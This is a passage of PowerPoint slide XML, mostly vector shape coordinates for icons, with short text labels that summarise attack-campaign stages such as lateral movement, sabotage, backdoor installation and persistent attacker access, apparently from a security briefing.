                  <a:pt x="78308" y="120474"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72285" y="120474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72285" y="108427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144569" y="108427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144569" y="120474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138545" y="120474"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="128569" y="120474"/>
                  <a:pt x="120474" y="128569"/>
                  <a:pt x="120474" y="138545"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="120474" y="162640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="120474" y="172617"/>
                  <a:pt x="128569" y="180711"/>
                  <a:pt x="138545" y="180711"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="174688" y="180711"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="184665" y="180711"/>
                  <a:pt x="192759" y="172617"/>
                  <a:pt x="192759" y="162640"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192759" y="138545"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="192759" y="128569"/>
                  <a:pt x="184665" y="120474"/>
                  <a:pt x="174688" y="120474"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168664" y="120474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168664" y="108427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204806" y="108427"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="211470" y="108427"/>
                  <a:pt x="216854" y="103043"/>
                  <a:pt x="216854" y="96379"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="216854" y="89716"/>
                  <a:pt x="211470" y="84332"/>
                  <a:pt x="204806" y="84332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="120474" y="84332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120474" y="72285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126498" y="72285"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="136475" y="72285"/>
                  <a:pt x="144569" y="64190"/>
                  <a:pt x="144569" y="54213"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="144569" y="30119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144569" y="20142"/>
                  <a:pt x="136475" y="12047"/>
                  <a:pt x="126498" y="12047"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="90356" y="12047"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="168664" y="141557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171676" y="141557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171676" y="159628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141557" y="159628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141557" y="141557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168664" y="141557"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="72285" y="141557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75296" y="141557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75296" y="159628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45178" y="159628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45178" y="141557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72285" y="141557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3" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520449" y="7159288"/>
            <a:ext cx="2546024" cy="192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Lateral Movement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524465" y="7384173"/>
            <a:ext cx="2537992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expansion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3225097" y="6805896"/>
            <a:ext cx="2674530" cy="835289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2674530" h="835289">
                <a:moveTo>
                  <a:pt x="32125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2642404" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2660147" y="0"/>
                  <a:pt x="2674530" y="14383"/>
                  <a:pt x="2674530" y="32125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2674530" y="803163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2674530" y="820906"/>
                  <a:pt x="2660147" y="835289"/>
                  <a:pt x="2642404" y="835289"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32125" y="835289"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14383" y="835289"/>
                  <a:pt x="0" y="820906"/>
                  <a:pt x="0" y="803163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32125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6" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4452931" y="6902276"/>
            <a:ext cx="216854" cy="192759"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="216854" h="192759">
                <a:moveTo>
                  <a:pt x="180711" y="-6024"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="183309" y="-6024"/>
                  <a:pt x="185606" y="-4367"/>
                  <a:pt x="186434" y="-1920"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="191517" y="13290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206726" y="18372"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="209174" y="19201"/>
                  <a:pt x="210830" y="21497"/>
                  <a:pt x="210830" y="24095"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="210830" y="26693"/>
                  <a:pt x="209174" y="28989"/>
                  <a:pt x="206726" y="29817"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="191517" y="34900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186434" y="50110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="185606" y="52557"/>
                  <a:pt x="183309" y="54213"/>
                  <a:pt x="180711" y="54213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178114" y="54213"/>
                  <a:pt x="175817" y="52557"/>
                  <a:pt x="174989" y="50110"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="169906" y="34900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154697" y="29817"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="152249" y="28989"/>
                  <a:pt x="150593" y="26693"/>
                  <a:pt x="150593" y="24095"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150593" y="21497"/>
                  <a:pt x="152249" y="19201"/>
                  <a:pt x="154697" y="18372"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="169906" y="13290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174989" y="-1920"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="175817" y="-4367"/>
                  <a:pt x="178114" y="-6024"/>
                  <a:pt x="180711" y="-6024"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="121001" y="36669"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="125707" y="31963"/>
                  <a:pt x="133350" y="31963"/>
                  <a:pt x="138056" y="36669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168175" y="66788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="172881" y="71494"/>
                  <a:pt x="172881" y="79137"/>
                  <a:pt x="168175" y="83843"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="164071" y="87946"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="167045" y="96229"/>
                  <a:pt x="168664" y="105151"/>
                  <a:pt x="168664" y="114488"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168664" y="157746"/>
                  <a:pt x="133614" y="192797"/>
                  <a:pt x="90356" y="192797"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47098" y="192797"/>
                  <a:pt x="12047" y="157708"/>
                  <a:pt x="12047" y="114451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12047" y="71193"/>
                  <a:pt x="47098" y="36142"/>
                  <a:pt x="90356" y="36142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99655" y="36142"/>
                  <a:pt x="108615" y="37761"/>
                  <a:pt x="116898" y="40773"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="121001" y="36669"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="54213" y="114451"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="54213" y="94497"/>
                  <a:pt x="70402" y="78308"/>
                  <a:pt x="90356" y="78308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95363" y="78308"/>
                  <a:pt x="99391" y="74280"/>
                  <a:pt x="99391" y="69273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99391" y="64266"/>
                  <a:pt x="95363" y="60237"/>
                  <a:pt x="90356" y="60237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60425" y="60237"/>
                  <a:pt x="36142" y="84520"/>
                  <a:pt x="36142" y="114451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36142" y="119458"/>
                  <a:pt x="40171" y="123486"/>
                  <a:pt x="45178" y="123486"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50185" y="123486"/>
                  <a:pt x="54213" y="119458"/>
                  <a:pt x="54213" y="114451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7" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289350" y="7159288"/>
            <a:ext cx="2546024" cy="192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Sabotage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3293366" y="7384173"/>
            <a:ext cx="2537992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88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destruction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6177120" y="5418034"/>
            <a:ext cx="5694419" cy="2361296"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5694419" h="2361296">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5694419" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5694419" y="2361296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2361296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0" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6177120" y="5418034"/>
            <a:ext cx="32126" cy="2361296"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32126" h="2361296">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32126" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32126" y="2361296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2361296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1" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6341768" y="5578666"/>
            <a:ext cx="160632" cy="160632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="160632" h="160632">
                <a:moveTo>
                  <a:pt x="79500" y="910"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="78183" y="314"/>
                  <a:pt x="76771" y="0"/>
                  <a:pt x="75296" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73822" y="0"/>
                  <a:pt x="72410" y="314"/>
                  <a:pt x="71092" y="910"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12016" y="25977"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114" y="28895"/>
                  <a:pt x="-31" y="35703"/>
                  <a:pt x="0" y="43923"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="75045"/>
                  <a:pt x="12957" y="131988"/>
                  <a:pt x="67014" y="157872"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72253" y="160381"/>
                  <a:pt x="78340" y="160381"/>
                  <a:pt x="83579" y="157872"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137667" y="131988"/>
                  <a:pt x="150467" y="75045"/>
                  <a:pt x="150593" y="43923"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150624" y="35703"/>
                  <a:pt x="145479" y="28895"/>
                  <a:pt x="138577" y="25977"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79500" y="910"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="75296" y="40158"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="79469" y="40158"/>
                  <a:pt x="82826" y="43515"/>
                  <a:pt x="82826" y="47688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82826" y="54872"/>
                  <a:pt x="91517" y="58480"/>
                  <a:pt x="96599" y="53398"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99548" y="50449"/>
                  <a:pt x="104317" y="50449"/>
                  <a:pt x="107235" y="53398"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110152" y="56347"/>
                  <a:pt x="110184" y="61116"/>
                  <a:pt x="107235" y="64033"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102152" y="69116"/>
                  <a:pt x="105760" y="77806"/>
                  <a:pt x="112945" y="77806"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="117117" y="77806"/>
                  <a:pt x="120474" y="81163"/>
                  <a:pt x="120474" y="85336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120474" y="89509"/>
                  <a:pt x="117117" y="92866"/>
                  <a:pt x="112945" y="92866"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105760" y="92866"/>
                  <a:pt x="102152" y="101556"/>
                  <a:pt x="107235" y="106639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110184" y="109588"/>
                  <a:pt x="110184" y="114356"/>
                  <a:pt x="107235" y="117274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104286" y="120192"/>
                  <a:pt x="99517" y="120223"/>
                  <a:pt x="96599" y="117274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91517" y="112192"/>
                  <a:pt x="82826" y="115800"/>
                  <a:pt x="82826" y="122984"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82826" y="127157"/>
                  <a:pt x="79469" y="130514"/>
                  <a:pt x="75296" y="130514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71124" y="130514"/>
                  <a:pt x="67767" y="127157"/>
                  <a:pt x="67767" y="122984"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67767" y="115800"/>
                  <a:pt x="59076" y="112192"/>
                  <a:pt x="53994" y="117274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51045" y="120223"/>
                  <a:pt x="46276" y="120223"/>
                  <a:pt x="43358" y="117274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40440" y="114325"/>
                  <a:pt x="40409" y="109556"/>
                  <a:pt x="43358" y="106639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48441" y="101556"/>
                  <a:pt x="44833" y="92866"/>
                  <a:pt x="37648" y="92866"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33476" y="92866"/>
                  <a:pt x="30119" y="89509"/>
                  <a:pt x="30119" y="85336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30119" y="81163"/>
                  <a:pt x="33476" y="77806"/>
                  <a:pt x="37648" y="77806"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44833" y="77806"/>
                  <a:pt x="48441" y="69116"/>
                  <a:pt x="43358" y="64033"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40409" y="61084"/>
                  <a:pt x="40409" y="56315"/>
                  <a:pt x="43358" y="53398"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46307" y="50480"/>
                  <a:pt x="51076" y="50449"/>
                  <a:pt x="53994" y="53398"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59076" y="58480"/>
                  <a:pt x="67767" y="54872"/>
                  <a:pt x="67767" y="47688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67767" y="43515"/>
                  <a:pt x="71124" y="40158"/>
                  <a:pt x="75296" y="40158"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="65257" y="82826"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="69413" y="82826"/>
                  <a:pt x="72787" y="79452"/>
                  <a:pt x="72787" y="75296"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72787" y="71141"/>
                  <a:pt x="69413" y="67767"/>
                  <a:pt x="65257" y="67767"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61101" y="67767"/>
                  <a:pt x="57727" y="71141"/>
                  <a:pt x="57727" y="75296"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57727" y="79452"/>
                  <a:pt x="61101" y="82826"/>
                  <a:pt x="65257" y="82826"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="92866" y="95375"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="92866" y="91220"/>
                  <a:pt x="89492" y="87846"/>
                  <a:pt x="85336" y="87846"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81180" y="87846"/>
                  <a:pt x="77806" y="91220"/>
                  <a:pt x="77806" y="95375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77806" y="99531"/>
                  <a:pt x="81180" y="102905"/>
                  <a:pt x="85336" y="102905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89492" y="102905"/>
                  <a:pt x="92866" y="99531"/>
                  <a:pt x="92866" y="95375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2" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522479" y="5546540"/>
            <a:ext cx="5300870" cy="22488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6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Attack Campaign Impact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6321689" y="5867805"/>
            <a:ext cx="257012" cy="257012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="257012" h="257012">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="224885" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="242628" y="0"/>
                  <a:pt x="257012" y="14384"/>
                  <a:pt x="257012" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="257012" y="224885"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257012" y="242628"/>
                  <a:pt x="242628" y="257012"/>
                  <a:pt x="224885" y="257012"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="257012"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14384" y="257012"/>
                  <a:pt x="0" y="242628"/>
                  <a:pt x="0" y="224885"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14384"/>
                  <a:pt x="14384" y="0"/>
                  <a:pt x="32126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4" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438147" y="5940089"/>
            <a:ext cx="28111" cy="112443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="28111" h="112443">
                <a:moveTo>
                  <a:pt x="21083" y="7028"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21083" y="3140"/>
                  <a:pt x="17943" y="0"/>
                  <a:pt x="14055" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10168" y="0"/>
                  <a:pt x="7028" y="3140"/>
                  <a:pt x="7028" y="7028"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7028" y="77304"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7028" y="81192"/>
                  <a:pt x="10168" y="84332"/>
                  <a:pt x="14055" y="84332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17943" y="84332"/>
                  <a:pt x="21083" y="81192"/>
                  <a:pt x="21083" y="77304"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21083" y="7028"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14055" y="112443"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18909" y="112443"/>
                  <a:pt x="22840" y="108512"/>
                  <a:pt x="22840" y="103658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22840" y="98805"/>
                  <a:pt x="18909" y="94874"/>
                  <a:pt x="14055" y="94874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9202" y="94874"/>
                  <a:pt x="5271" y="98805"/>
                  <a:pt x="5271" y="103658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5271" y="108512"/>
                  <a:pt x="9202" y="112443"/>
                  <a:pt x="14055" y="112443"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6467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5" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675080" y="5867805"/>
            <a:ext cx="3076111" cy="192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Compromise Confirmation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6675080" y="6060564"/>
            <a:ext cx="3068079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Backdoor installation indicates successful system compromise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6321689" y="6285449"/>
            <a:ext cx="257012" cy="257012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="257012" h="257012">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="224885" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="242628" y="0"/>
                  <a:pt x="257012" y="14384"/>
                  <a:pt x="257012" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="257012" y="224885"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257012" y="242628"/>
                  <a:pt x="242628" y="257012"/>
                  <a:pt x="224885" y="257012"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="257012"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14384" y="257012"/>
                  <a:pt x="0" y="242628"/>
                  <a:pt x="0" y="224885"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14384"/>
                  <a:pt x="14384" y="0"/>
                  <a:pt x="32126" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6900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8" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6395981" y="6357734"/>
            <a:ext cx="112443" cy="112443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112443" h="112443">
                <a:moveTo>
                  <a:pt x="56221" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="87251" y="0"/>
                  <a:pt x="112443" y="25192"/>
                  <a:pt x="112443" y="56221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112443" y="87251"/>
                  <a:pt x="87251" y="112443"/>
                  <a:pt x="56221" y="112443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25192" y="112443"/>
                  <a:pt x="0" y="87251"/>
                  <a:pt x="0" y="56221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="25192"/>
                  <a:pt x="25192" y="0"/>
                  <a:pt x="56221" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="50951" y="26354"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="50951" y="56221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="50951" y="57978"/>
                  <a:pt x="51829" y="59625"/>
                  <a:pt x="53300" y="60614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74383" y="74669"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76799" y="76294"/>
                  <a:pt x="80071" y="75635"/>
                  <a:pt x="81697" y="73198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83322" y="70760"/>
                  <a:pt x="82663" y="67510"/>
                  <a:pt x="80225" y="65884"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="61492" y="53410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61492" y="26354"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="61492" y="23433"/>
                  <a:pt x="59142" y="21083"/>
                  <a:pt x="56221" y="21083"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53300" y="21083"/>
                  <a:pt x="50951" y="23433"/>
                  <a:pt x="50951" y="26354"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF890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9" name="Text 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675080" y="6285449"/>
            <a:ext cx="2738783" cy="192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Persistent Access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6675080" y="6478208"/>
            <a:ext cx="2730751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Enables long-term attacker presence and return access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321689" y="6703093"/>
            <a:ext cx="257012" cy="257012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="257012" h="257012">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="224885" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="242628" y="0"/>
                  <a:pt x="257012" y="14384"/>
                  <a:pt x="257012" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="257012" y="224885"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257012" y="242628"/>
                  <a:pt x="242628" y="257012"/>
                  <a:pt x="224885" y="257012"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="257012"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14384" y="257012"/>
                  <a:pt x="0" y="242628"/>
                  <a:pt x="0" y="224885"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14384"/>
                  <a:pt x="14384" y="0"/>
